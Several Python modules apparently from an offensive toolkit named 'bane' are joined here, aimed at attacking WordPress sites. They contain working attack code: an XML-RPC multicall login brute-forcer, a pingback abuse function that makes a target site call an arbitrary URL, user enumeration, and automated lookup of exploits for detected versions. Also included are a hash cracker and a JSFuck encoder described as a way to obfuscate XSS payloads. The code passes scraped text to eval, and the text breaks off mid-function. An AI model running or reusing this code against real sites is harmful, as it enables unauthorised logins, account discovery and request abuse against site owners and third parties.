from bane.scanners.cms.utils import *




def wp_xmlrpc_methods(
    u, user_agent=None, cookie=None, path="/xmlrpc.php", timeout=10, proxy=None,headers={}
):
    if u[len(u) - 1] == "/":
        u = u[0 : len(u) - 1]
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    u += path
    post = """
 <?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>
"""
    try:
        r = requests.post(
            u, data=post, headers=hed, proxies=proxy, timeout=timeout, verify=False
        )
        return [
            x.replace("</string></value>", "").replace("<value><string>", "").strip()
            for x in r.text.split("<data>")[1].split("</data>")[0].strip().split("\n")
        ]
    except:
        pass
    return []


def wp_xmlrpc_bruteforce(
    u, user_agent=None, cookie=None, path="/xmlrpc.php", timeout=10, proxy=None,headers={}
):
    if u[len(u) - 1] == "/":
        u = u[0 : len(u) - 1]
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    u += path
    post = """
 <?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>
"""
    try:
        r = requests.post(
            u, data=post, headers=hed, proxies=proxy, timeout=timeout, verify=False
        )
        if "wp.getUsersBlogs" in [
            x.replace("</string></value>", "").replace("<value><string>", "").strip()
            for x in r.text.split("<data>")[1].split("</data>")[0].strip().split("\n")
        ]:
            return True
    except:
        pass
    return False


def wp_xmlrpc_mass_bruteforce(
    u, user_agent=None, cookie=None, path="/xmlrpc.php", timeout=10, proxy=None, headers={}
):
    if u[len(u) - 1] == "/":
        u = u[0 : len(u) - 1]
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    u += path
    post = """
 <?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>
"""
    try:
        r = requests.post(
            u, data=post, headers=hed, proxies=proxy, timeout=timeout, verify=False
        )
        l = [
            x.replace("</string></value>", "").replace("<value><string>", "").strip()
            for x in r.text.split("<data>")[1].split("</data>")[0].strip().split("\n")
        ]
        if ("wp.getUsersBlogs" in l) and ("system.multicall" in l):
            return True
    except:
        pass
    return False


def wp_xmlrpc_pingback(
    u,
    user_agent=None,
    test_url="https://www.google.com/",
    cookie=None,
    path="/xmlrpc.php",
    timeout=10,
    proxy=None,
    headers={}
):
    if u[len(u) - 1] == "/":
        u = u[0 : len(u) - 1]
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    u += path
    post = """
 <?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>
"""
    try:
        r = requests.post(
            u, data=post, headers=hed, proxies=proxy, timeout=timeout, verify=False
        )
        l = [
            x.replace("</string></value>", "").replace("<value><string>", "").strip()
            for x in r.text.split("<data>")[1].split("</data>")[0].strip().split("\n")
        ]
        if "pingback.ping" in l:
            return True
    except:
        pass
    return False


def wp_xmlrpc_pingback_exploit(
    u,
    user_agent=None,
    target_url="https://www.google.com/",
    cookie=None,
    path="/xmlrpc.php",
    timeout=10,
    proxy=None,
    headers={}
):
    url = u.split("://")[0] + "://" + urlparse(u).netloc
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    url += path
    post = (
        """<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>"""
        + target_url
        + """</string></value>
</param>
<param>
<value><string>"""
        + u
        + """</string></value>
</param>
</params>
</methodCall>
"""
    )
    try:
        r = requests.post(
            url, data=post, headers=hed, proxies=proxy, timeout=timeout, verify=False
        )
    except:
        pass


def wpadmin(
    u,
    username,
    password,
    user_agent=None,
    cookie=None,
    path="/xmlrpc.php",
    timeout=10,
    proxy=None,
    headers={}
):
    """
    this function is to check the wordpress given logins using the xmlrpc.php file. if they are correct it returns True, else False"""
    if u[len(u) - 1] == "/":
        u = u[0 : len(u) - 1]
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    u += path
    post = """<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>{}</value></param>
<param><value>{}</value></param>
</params>
</methodCall>""".format(
        username, password
    )
    try:
        r = requests.post(
            u, data=post, headers=hed, proxies=proxy, timeout=timeout, verify=False
        )
        if "isAdmin" in r.text:
            return True
    except:
        pass
    return False


def wpadmin_mass(
    u,
    word_list=[],
    user_agent=None,
    cookie=None,
    path="/xmlrpc.php",
    timeout=10,
    proxy=None,
    headers={}
):
    """
    this function is to check the wordpress given logins using the xmlrpc.php file. if they are correct it returns True, else False"""
    if u[len(u) - 1] == "/":
        u = u[0 : len(u) - 1]
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    u += path
    post = """
 <?xml version="1.0"?>
<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>
 """
    for x in word_list:
        post += """<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array>
  <data><value><array><data><value><string>{}</string></value><value><string>{}</string></value>
  </data></array></value></data></array></value></member></struct></value>
""".format(
            x.split(":")[0], x.split(":")[1]
        )
    post += """
</data></array></value></param></params></methodCall>
 """
    try:
        r = requests.post(
            u, data=post, headers=hed, proxies=proxy, timeout=timeout, verify=False
        )
        l = (
            r.text.split("<array><data>")[1]
            .split("</array></data>")[0]
            .strip()
            .split("</struct></value>")
        )
        for x in l:
            if "Incorrect username or password" not in x:
                return word_list[l.index(x)]
    except:
        pass
    return ""


def wp_users(
    u, path="/wp-json/wp/v2/users", timeout=10, user_agent=None, cookie=None, proxy=None, headers={}
):
    """
    this function is to get WP users"""
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    if u[len(u) - 1] == "/":
        u = u[0 : len(u) - 1]
    u += path
    try:
        r = requests.get(u, headers=hed, proxies=proxy, timeout=timeout, verify=False)
        if ('{"id":' in r.text) and ('"name":"' in r.text):
            a = json.loads(r.text)
            users = []
            for x in range(len(a)):
                users.append(
                    {"id": a[x]["id"], "slug": a[x]["slug"], "name": a[x]["name"]}
                )
            return users
    except Exception as e:
        return []
    return []


def wp_user(
    u,
    path="/wp-json/wp/v2/users/",
    user=1,
    user_agent=None,
    cookie=None,
    timeout=10,
    proxy=None,
    headers={}
):
    """
    this function is to return all informations about a WP user with a given index integer"""
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    if u[len(u) - 1] == "/":
        u = u[0 : len(u) - 1]
    hed.update(headers)
    u += path + str(user)
    try:
        r = requests.get(u, headers=hed, proxies=proxy, timeout=timeout, verify=False)
        if ('{"id":' in r.text) and ('"name":"' in r.text):
            return json.loads(r.text)
    except Exception as e:
        pass


def wp_users_enumeration(
    u,
    path="/",
    timeout=15,
    user_agent=None,
    cookie=None,
    proxy=None,
    start=1,
    end=20,
    logs=True,
    headers={}
):
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    d = u.split("://")[1].split("/")[0]
    u = u.split(d)[0] + d
    l = []
    for x in range(start, end + 1):
        try:
            r = requests.get(
                u + path + "?author=" + str(x),
                headers=hed,
                proxies=proxy,
                timeout=timeout,
                verify=False,
            ).text
            a = r.split('<meta property="og:title" content="')[1].split(">")[0]
            b=r.split('<meta property="og:url" content="')[1].split(">")[0]
            c=b.split('/author/')[1].split('/')[0]
            if "," in a:
                a = a.split(",")[0]
                l.append({'id':x, 'name':a,'slug':c})
                if logs == True:
                    print(
                        "\t[+] id: {} | name: {} | slug: {}".format(
                            x,#.encode("utf-8", "replace"), 
                            a,
                            c
                        )
                    )
        except KeyboardInterrupt:
            break
        except:
            pass
    return l


def wp_version(u, timeout=15, user_agent=None, cookie=None, proxy=None,headers={}):
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    try:
        r = requests.get(
            u, headers=hed, proxies=proxy, timeout=timeout, verify=False
        ).text
        return (
            r.split('<meta name="generator" content="')[1]
            .split('"')[0]
            .strip()
            .split(" ")[1]
        )
    except:
        pass



def version_string_to_list(version):
    return [int(x) for x in version.split('.')]




def extract_with_versions(cve_list,software_version):
    results = []
    for cve in cve_list:
        title = cve['title']
        try:
            version = [ x.strip() for x in title.split() if '.' in x and x.endswith('.')==False and x.startswith('.')==False][0]
        except:
            version=''
        if version!='':
            try:
                c=title.split(version)[0].split()
                if c[-1].strip()=='<':
                    comparison='<'
                elif c[-1].strip()=='>':
                    comparison='>'
                elif c[-1].strip()=='<=':
                    comparison='<='
                else:
                    comparison='=='
            except:
                comparison='=='
        if version=='':
            version=software_version
        if '-' not in version:
            if eval('{}{}{}'.format(version_string_to_list(software_version),comparison,version_string_to_list(version)))==True:
                results.append(cve)
        else:
            if eval('{}>{} and {}<{}'.format(version_string_to_list(software_version),version_string_to_list(version.split('-')[0].strip()),version_string_to_list(software_version),version_string_to_list(version.split('-')[1].strip())))==True:
                results.append(cve)
    return results




def fetch_wp_exploits(s,max_tries=3,proxy=None,user_agent=None,timeout=15,cookie=None,sleep_time_min=10,sleep_time_max=20,when_blocked_sleep=30):
    if s['version'].strip()=='':
        return []
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    i=1
    l=[]
    result=[]
    tries=0
    while True:
        tries+=1
        #print(tries)
        if tries==max_tries:
            break
        try:
            r=requests.get('https://wpscan.com/search?page={}&text={}'.format(i,s['name']),headers=hed,timeout=timeout,proxies=proxy,verify=False).text
            #print(r)
            data=json.loads(r.split('"pageData":{"props":{"data":')[1].split(',"metadata":{"pageCount":')[0])
            if len(data)==0:
                break
            l+=data
            i+=1
            tries=0
        except Exception as ex:
            #raise(ex)
            time.sleep(when_blocked_sleep)
        time.sleep(random.randint(sleep_time_min,sleep_time_max))
    for x in l:
        x['exploit_url']='https://wpscan.com/vulnerability/'+x['id']
    return extract_with_versions(l,s['version'])



def get_wp_infos(u,max_wpscan_tries=3,cookie=None,user_agent=None,timeout=15,proxy=None,user_enum_start=1,user_enum_end=20,wpscan_cookie=None,sleep_time_min=10,sleep_time_max=20,when_blocked_sleep=30,logs=True,crt_timeout=120,wayback_timeout=120,subdomain_check_timeout=10,max_wayback_urls=10,subdomains_only=True,headers={}):
    domain=u.split('://')[1].split('/')[0].split(':')[0]
    root_domain=extract_root_domain(domain)
    ip=socket.gethostbyname(domain.split(':')[0])
    if u[len(u) - 1] == "/":
        u = u[0 : len(u) - 1]
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    response = requests.get(u, headers=hed, proxies=proxy, timeout=timeout, verify=False)
    server=response.headers.get('Server','')
    try:
        server_os=[x for x in server.split() if x.startswith('(')==True][0].replace('(','').replace(')','')
    except:
        server_os=''
    backend=response.headers.get('X-Powered-By','')
    html_content = response.text

    # Parse the HTML content
    soup = BeautifulSoup(html_content, 'html.parser')

    # Find themes and plugins information
    themes = []
    plugins = []
    try:
        #print(response.split('<meta name="generator" content="')[1].split('"')[0])
        wp_version=response.text.lower().split('<meta name="generator" content="wordpress')[1].split('"')[0].strip()
    except Exception as ex:
        #raise(ex)
        wp_version=''
    # Extract themes
    if logs==True:
        print("WordPress site info:\n\n\tURL: {}\n\tDomain: {}\n\tIP: {}\n\tServer: {}\n\tOS: {}\n\tBackend technology: {}\n\tWordPress version: {}\n".format(u,domain,ip,server,server_os,backend,wp_version))
    clickj=page_clickjacking(u,request_headers=response.headers)
    if logs==True:
        print("[i] Looking for subdomains...")
    subs=get_subdomains(root_domain,logs=logs, crt_timeout=crt_timeout,user_agent=user_agent,cookie=cookie,wayback_timeout=wayback_timeout,subdomain_check_timeout=subdomain_check_timeout,max_wayback_urls=max_wayback_urls,proxy=proxy,subdomains_only=subdomains_only)
    if logs==True:
        print("[i] Cheking if we can sniff some cookies over some links...")
        print()
    media_non_ssl=sniffable_links(u,content=response.text,logs=logs,request_headers=response.headers)
    if logs==True:
        print()
    theme_links = soup.find_all('link', rel='stylesheet')
    for link in theme_links:
        href = link.get('href')
        #print(href)
        if 'themes' in href:
            try:
                theme_name = href.split('/themes/')[1].split('/')[0]
                try:
                    version=href.split('?')[1].split('=')[1]
                except:
                    version=''
                theme={'name':theme_name,'version':version}
                if theme not in themes:
                    themes.append(theme)
            except:
                pass
        elif 'plugins' in href:
            try:
                plugin_name = href.split('/plugins/')[1].split('/')[0]
                try:
                    version=href.split('?')[1].split('=')[1]
                except:
                    version=''
                plugin={'name':plugin_name,'version':version}
                if plugin not in plugins:
                    plugins.append(plugin)
            except:
                pass
    users_json_exposed=True
    json_path=u+'/wp-json/wp/v2/users'
    if logs==True:
        print('[i] Fetching users from: {}'.format(json_path))
    json_users=wp_users(u,timeout=timeout,cookie=cookie,user_agent=user_agent,proxy=proxy,headers=headers)
    if logs==True:
        for x in json_users:
            print('\t[+] id: {} | name: {} | slug: {}'.format(x['id'],x['name'],x['slug']))
        print()
    if json_users==[]:
        users_json_exposed=False
    can_enumerate_users=True
    if logs==True:
        print('[i] Trying enumerating the authors...')
    enumerated_users= wp_users_enumeration(u,logs=logs,timeout=timeout,cookie=cookie,user_agent=user_agent,proxy=proxy,start=user_enum_start,end=user_enum_end,headers=headers)
    if enumerated_users==[]:
        can_enumerate_users=False
    else:
        if logs==True:
            print()
            for x in enumerated_users:
                print('\t[+] id: {} | name: {} | slug: {}'.format(x['id'],x['name'],x['slug']))
    if logs==True:
        print()
        print('[i] Checking if XMLRPC is enabled from: {}'.format(u+'/xmlrpc.php'))
    xmlrpcs=wp_xmlrpc_methods(u,timeout=timeout,cookie=cookie,user_agent=user_agent,proxy=proxy,headers=headers)
    can_b_u=("wp.getUsersBlogs" in xmlrpcs) and ("system.multicall" in xmlrpcs)
    can_pb="pingback.ping" in xmlrpcs
    if logs==True:
        if len(xmlrpcs)>0:
            print('[+] enabled')
            if can_b_u==True:
                print('\t[+] Vulnerable to users bruteforce')
            if can_pb==True:
                print('\t[+] Vulnerable to pingback')
        else:
            print('\t[-] disabled')
        print()
    wp_vulns=[]
    if wp_version!='':
        if logs==True:
            print('[i] looking for exploits for version: {}\n'.format(wp_version))
        wpvulns=vulners_search('wordpress',version=wp_version,proxy=proxy)
        for x in wpvulns:
            if 'wordpress' in x['title'].lower() or 'wordpress' in x['description'].lower():
                wp_vulns.append(x)
        for x in wp_vulns:
            for i in ['cpe', 'cpe23', 'cwe', 'affectedSoftware']:
                try:
                    del x[i]
                except:
                    pass
        if logs==True:
            if len(wp_vulns)==0:
                print('\t[-] none was found')
            else:
                for x in wp_vulns:
                    print("\tTitle : {}\n\tDescription: {}\n\tLink: {}".format(x['title'],x['description'],x['href']))
                    print()
    backend_technology_exploits={}
    if backend!='':
        bk=[]
        for back in backend.split():
            if logs==True:
                print('[i] looking for exploits for : {}\n'.format(back))
            if '/' not in back:
                if logs==True:
                    print('\t[-] unknown version\n')
            else:
                bk=vulners_search(back.split('/')[0].lower(),version=back.split('/')[1],proxy=proxy)
            for x in bk:
                for i in ['cpe', 'cpe23', 'cwe', 'affectedSoftware']:
                    try:
                        del x[i]
                    except:
                        pass
            backend_technology_exploits.update({back:bk})
            if logs==True:
                if len(bk)==0:
                    print('\t[-] none was found')
                else:
                    for x in bk:
                        print("\tTitle : {}\n\tDescription: {}\n\tLink: {}".format(x['title'],x['description'],x['href']))
                        print()
    server_exploits={}
    if server!='':
        for sv in server.split():
            if sv.startswith('(')==False:
                sv_e=[]
                if logs==True:
                    print('[i] looking for exploits for : {}\n'.format(sv))
                if '/' in sv:
                    sv_e=vulners_search(sv.split('/')[0].lower(),version=sv.split('/')[1],proxy=proxy)
                else:
                    if logs==True:
                        print('\t[-] unknown version\n')
                for x in sv_e:
                    for i in ['cpe', 'cpe23', 'cwe', 'affectedSoftware']:
                        try:
                            del x[i]
                        except:
                            pass
                server_exploits.update({sv:sv_e})
                if logs==True:
                    if len(sv_e)==0:
                        print('\t[-] none was found')
                    else:
                        for x in sv_e:
                            print("\tTitle : {}\n\tDescription: {}\n\tLink: {}".format(x['title'],x['description'],x['href']))
                            print()
    if len(themes)>0:
        if logs==True:
            print('[i] looking for exploits for the themes:\n')
    for x in themes:
        if logs==True:
            print('[i] Theme: {} | Version: {}\n'.format(x['name'],x['version']))
        x['exploits']=fetch_wp_exploits(x,max_tries=max_wpscan_tries,proxy=proxy,user_agent=user_agent,timeout=timeout,cookie=wpscan_cookie,sleep_time_min=sleep_time_min,sleep_time_max=sleep_time_max,when_blocked_sleep=when_blocked_sleep)
        if logs==True:
            for i in x['exploits']:
                print("\tTitle: {}\n\tLink: {}".format(i['title'],i['exploit_url']))
                print()
    if len(plugins)>0:
        if logs==True:
            print()
            print('[i] looking for exploits for the plugins:\n')
    for x in plugins:
        if logs==True:
            print('[i] Plugin: {} | Version: {}\n'.format(x['name'],x['version']))
        x['exploits']=fetch_wp_exploits(x,max_tries=max_wpscan_tries,proxy=proxy,user_agent=user_agent,timeout=timeout,cookie=wpscan_cookie,sleep_time_min=sleep_time_min,sleep_time_max=sleep_time_max,when_blocked_sleep=when_blocked_sleep)
        if logs==True:
            for i in x['exploits']:
                print("\tTitle: {}\n\tLink: {}".format(i['title'],i['exploit_url']))
                print()
    return {'url':u,'domain':domain,'ip':ip,'root_domain':root_domain,'sub_domains':subs,'server':server,'os':server_os,'backend_technology':backend,'wordpress_version':wp_version,'sniffable_links':media_non_ssl,'clickjackable':clickj,'themes':themes,'plugins':plugins,'users_json_exposed':users_json_exposed,'exopsed_json_users':{'users':json_users,'path':json_path},'can_enumerate_users':can_enumerate_users,'enumerated_users':enumerated_users,'enabled_xmlrpc_methods':xmlrpcs,"xmlrpc_bruteforce_users":can_b_u,"pingback_enabled":can_pb,"exploits":wp_vulns,'backend_technology_exploits':backend_technology_exploits,'server_exploits':server_exploits}



from bane.bruteforce.utils import *


class decrypt:
    __slots__ = ["stop", "finish", "result", "logs"]

    def __init__(
        self,
        u,
        word_list=[],
        threads_daemon=True,
        md5_hash=False,
        sha1_hash=False,
        sha256_hash=False,
        sha224_hash=False,
        sha384_hash=False,
        sha512_hash=False,
        base64_string=False,
        caesar_hash=False,
        logs=False,
    ):
        self.logs = logs
        self.stop = False
        self.finish = False
        self.result = {}
        t = threading.Thread(
            target=self.crack,
            args=(
                u,
                word_list,
                md5_hash,
                sha1_hash,
                sha256_hash,
                sha224_hash,
                sha384_hash,
                sha512_hash,
                base64_string,
                caesar_hash,
                logs,
            ),
        )
        t.daemon = threads_daemon
        t.start()

    def crack(
        self,
        u,
        word_list,
        md5_hash,
        sha1_hash,
        sha256_hash,
        sha224_hash,
        sha384_hash,
        sha512_hash,
        base64_string,
        caesar_hash,
        logs,
    ):
        if self.logs == True:
            print("[!]hash: " + u + "\nbruteforcing has started!!!\n")
        for x in word_list:
            if self.stop == True:
                break
            if md5_hash == True:
                if dmd5(x, u) == True:
                    if self.logs == True:
                        print("[+]Hash match found: " + x + " | Type: md5")
                    self.result = {u: ["md5:" + x]}
                    break
            if sha1_hash == True:
                if dsha1(x, u) == True:
                    if self.logs == True:
                        print("[+]Hash match found: " + x + " | Type: sha1")
                    self.result = {u: ["sha1:" + x]}
                    break
            if sha256_hash == True:
                if dsha256(x, u) == True:
                    if self.logs == True:
                        print("[+]Hash match found: " + x + " | Type: sha256")
                    self.result = {u: ["sha256:" + x]}
                    break
            if sha224_hash == True:
                if dsha224(x, u) == True:
                    if self.logs == True:
                        print("[+]Hash match found: " + x + " | Type: sha224")
                    self.result = {u: ["sha224:" + x]}
                    break
            if sha384_hash == True:
                if dsha384(x, u) == True:
                    if self.logs == True:
                        print("[+]Hash match found: " + x + " | Type: sha384")
                    self.result = {u: ["sha384:" + x]}
                    break
            if sha512_hash == True:
                if dsha512(x, u) == True:
                    if self.logs == True:
                        print("[+]Hash match found: " + x + " | Type: sha512")
                    self.result = {u: ["sha512:" + x]}
                    break
            if base64_string == True:
                if base64_decode(x) == u:
                    if self.logs == True:
                        print("[+]Hash match found: " + x + " | Type: base64")
                    self.result = {u: ["base64:" + x]}
                    break
            if caesar_hash == True:
                for i in range(1, 27):
                    if dcaesar(x, i) == True:
                        if self.logs == True:
                            print(
                                "[+]Hash match found: "
                                + x
                                + " | Type: caesar | Key: "
                                + str(i)
                            )
                        self.result = {u: ["caesar" + str(i) + ":" + x]}
                        break
        if self.result == {}:
            if self.logs == True:
                print("[-]No match found")
        self.finish = True

    def done(self):
        return self.finish


from bane.cryptographers.utils import *

def xor_string(data, key):
    """
    function to return XOR encrypted string
    """
    i = 0
    c = ""
    l = len(data)
    k = len(key)
    if (not data) or (l == 0):
        raise Exception("You must provide data")
    if (not key) or (k == 0):
        raise Exception("You must provide a key")
    while i < l:
        for x in key:
            if i == l:
                break
            if type(data[i]) == str:
                c += chr(ord(data[i]) ^ ord(x))
            else:
                c += chr(data[i] ^ ord(x))
            i += 1
    i = None
    l = None
    k = None
    data = None
    key = None
    return c


def xor_file(f, key):
    if f and key:
        with open(f, "rb") as f:
            w = f.read()
        f.close()
        return xor_string(w, key)



import re,random,sys

"""

I've edited this script to be compatible with python2.X/3.X 

"""

def get_dict(d):
    if  sys.version_info < (3,0):
        return d.iteritems()
    else:
        return tuple(d.items())


"""
P.S: I didn't write the following class but i find it very useful to encode XSS payloads. I would like to thank the guy who did it, good job bro <3
"""



class js_fuck(object):
    '''
    Encodes/Decodes Javascript using JSFuck 0.4.0
    (https://github.com/aemkei/jsfuck)

    Class variables:
    USE_CHAR_CODE   -- string used to indicate which keys in MAPPING will
                                           be encoded using their ASCII character code

    MIN                            -- int the position within MAPPING dictionary to start
                                          iterating from, for the final encoding pass

    MAX                          -- int the maximum value to iterate in MAPPING
                                         on the final encode

    SIMPLE                    -- dictionary of built-in Javascript types and values

    CONSTRUCTORS   -- dictionary of mostly Javascript data types

    MAPPING                -- dictionary of every character to be mapped and decoded

    GLOBAL                  -- string used to replace 'GLOBAL' value on final encode

    '''

    USE_CHAR_CODE = "USE_CHAR_CODE"

    MIN, MAX = 32, 126

    SIMPLE = {
        'false':      '![]',
        'true':       '!![]',
        'undefined':  '[][[]]',
        'NaN':        '+[![]]',
        'Infinity':   ('+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+'
                       '!+[]]+[+[]]+[+[]]+[+[]])')  # +"1e1000"
    }

    CONSTRUCTORS = {
        'Array':    '[]',
        'Number':   '(+[])',
        'String':   '([]+[])',
        'Boolean':  '(![])',
        'Function': '[]["fill"]',
        'RegExp':   'Function("return/"+false+"/")()'
    }

    MAPPING = {
        'a':   '(false+"")[1]',
        'b':   '([]["entries"]()+"")[2]',
        'c':   '([]["fill"]+"")[3]',
        'd':   '(undefined+"")[2]',
        'e':   '(true+"")[3]',
        'f':   '(false+"")[0]',
        'g':   '(false+[0]+String)[20]',
        'h':   '(+(101))["to"+String["name"]](21)[1]',
        'i':   '([false]+undefined)[10]',
        'j':   '([]["entries"]()+"")[3]',
        'k':   '(+(20))["to"+String["name"]](21)',
        'l':   '(false+"")[2]',
        'm':   '(Number+"")[11]',
        'n':   '(undefined+"")[1]',
        'o':   '(true+[]["fill"])[10]',
        'p':   '(+(211))["to"+String["name"]](31)[1]',
        'q':   '(+(212))["to"+String["name"]](31)[1]',
        'r':   '(true+"")[1]',
        's':   '(false+"")[3]',
        't':   '(true+"")[0]',
        'u':   '(undefined+"")[0]',
        'v':   '(+(31))["to"+String["name"]](32)',
        'w':   '(+(32))["to"+String["name"]](33)',
        'x':   '(+(101))["to"+String["name"]](34)[1]',
        'y':   '(NaN+[Infinity])[10]',
        'z':   '(+(35))["to"+String["name"]](36)',

        'A':   '(+[]+Array)[10]',
        'B':   '(+[]+Boolean)[10]',
        'C':   'Function("return escape")()(("")["italics"]())[2]',
        'D':   'Function("return escape")()([]["fill"])["slice"]("-1")',
        'E':   '(RegExp+"")[12]',
        'F':   '(+[]+Function)[10]',
        'G':   '(false+Function("return Date")()())[30]',
        'H':   USE_CHAR_CODE,
        'I':   '(Infinity+"")[0]',
        'J':   USE_CHAR_CODE,
        'K':   USE_CHAR_CODE,
        'L':   USE_CHAR_CODE,
        'M':   '(true+Function("return Date")()())[30]',
        'N':   '(NaN+"")[0]',
        'O':   '(NaN+Function("return{}")())[11]',
        'P':   USE_CHAR_CODE,
        'Q':   USE_CHAR_CODE,
        'R':   '(+[]+RegExp)[10]',
        'S':   '(+[]+String)[10]',
        'T':   '(NaN+Function("return Date")()())[30]',
        'U':   ('(NaN+Function("return{}")()["to"+String'
                '["name"]]["call"]())[11]'),
        'V':   USE_CHAR_CODE,
        'W':   USE_CHAR_CODE,
        'X':   USE_CHAR_CODE,
        'Y':   USE_CHAR_CODE,
        'Z':   USE_CHAR_CODE,

        ' ':   '(NaN+[]["fill"])[11]',
        '!':   USE_CHAR_CODE,
        '"':   '("")["fontcolor"]()[12]',
        '#':   USE_CHAR_CODE,
        '$':   USE_CHAR_CODE,
        '%':   'Function("return escape")()([]["fill"])[21]',
        '&':   '("")["link"](0+")[10]',
        '\'':  USE_CHAR_CODE,
        '(':   '(undefined+[]["fill"])[22]',
        ')':   '([0]+false+[]["fill"])[20]',
        '*':   USE_CHAR_CODE,
        '+':   ('(+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]'
                '+[+!+[]]+[+[]]+[+[]])+[])[2]'),
        ',':   '([]["slice"]["call"](false+"")+"")[1]',
        '-':   '(+(.+[0000000001])+"")[2]',
        '.':   ('(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+'
                '[]+!+[]]+[+[]])+[])[+!+[]]'),
        '/':   '(false+[0])["italics"]()[10]',
        ':':   '(RegExp()+"")[3]',
        ';':   '("")["link"](")[14]',
        '<':   '("")["italics"]()[0]',
        '=':   '("")["fontcolor"]()[11]',
        '>':   '("")["italics"]()[2]',
        '?':   '(RegExp()+"")[2]',
        '@':   USE_CHAR_CODE,
        '[':   '([]["entries"]()+"")[0]',
        '\\':  USE_CHAR_CODE,
        ']':   '([]["entries"]()+"")[22]',
        '^':   USE_CHAR_CODE,
        '_':   USE_CHAR_CODE,
        '`':   USE_CHAR_CODE,
        '{':   '(true+[]["fill"])[20]',
        '|':   USE_CHAR_CODE,
        '}':   '([]["fill"]+"")["slice"]("-1")',
        '~':   USE_CHAR_CODE
    }

    GLOBAL = 'Function("return this")()'

    def __init__(self, js=None):
        '''
        Checks if passed some Javascript and if so assigns an instance variable
        to that of the pass Javascript.

        Populates MAPPING dictionary with the keys corresponding encoded value.

        Keyword arguments:
        js -- string containing the encoded Javascript to be
              decoded (defualt None)

        '''
        if js:
            self.js = js

        self.__fillMissingDigits()
        self.__fillMissingChars()
        self.__replaceMap()
        self.__replaceStrings()

    def decode(self, js=None):
        '''
        Decodes JSFuck'd Javascript

        Keyword arguments:
        js -- string containing the JSFuck to be decoded (defualt None)

        Returns:
        js -- string of decoded Javascript

        '''
        if not js:
            js = self.js

        js = self.__mapping(js)

        # removes concatenation operators
        js = re.sub('\+(?!\+)', '', js)
        js = js.replace('++', '+')

        # check to see if source js is eval'd
        if '[][fill][constructor]' in js:
            js = self.uneval(js)

        self.js = js

        return js

    def encode(self, js=None, wrapWithEval=False, runInParentScope=False):
        '''
        Encodes vanilla Javascript to JSFuck obfuscated Javascript

        Keyword arguments:
        js                            -- string of unobfuscated Javascript

        wrapWithEval        -- boolean determines whether to wrap with an eval

        runInParentScope -- boolean determines whether to run in parents scope

        '''
        output = []

        if not js:
            js = self.js

            if not js:
                return ''

        regex = ''

        for i in self.SIMPLE:
            regex += i + '|'

        regex += '.'

        def inputReplacer(c):
            c = c.group()
            replacement = self.SIMPLE[c] if c in self.SIMPLE else False

            if replacement:
                output.append('[' + replacement + ']+[]')

            else:
                replacement = self.MAPPING[c] if c in self.MAPPING else False

                if replacement:
                    output.append(replacement)
                else:
                    replacement = (
                        '([]+[])[' + self.encode('constructor') + ']'
                        '[' + self.encode('fromCharCode') + ']'
                        '(' + self.encode(str(ord(c[0]))) + ')')

                    output.append(replacement)
                    self.MAPPING[c] = replacement

        re.sub(regex, inputReplacer, js)

        output = '+'.join(output)

        if re.search(r'^\d$', js):
            output += "+[]"

        if wrapWithEval:
            if runInParentScope:
                output = ('[][' + self.encode('fill') + ']'
                          '[' + self.encode('constructor') + ']'
                          '(' + self.encode('return eval') + ')()'
                          '(' + output + ')')

            else:
                output = ('[][' + self.encode('fill') + ']'
                          '[' + self.encode('constructor') + ']'
                          '(' + output + ')')

        self.js = output

        return output

    def uneval(self, js):
        '''
        Unevals a piece of Javascript wrapped with an encoded eval

        Keyword arguments:
        js -- string containing an eval wrapped string of Javascript

        Returns:
        js -- string with eval removed

        '''
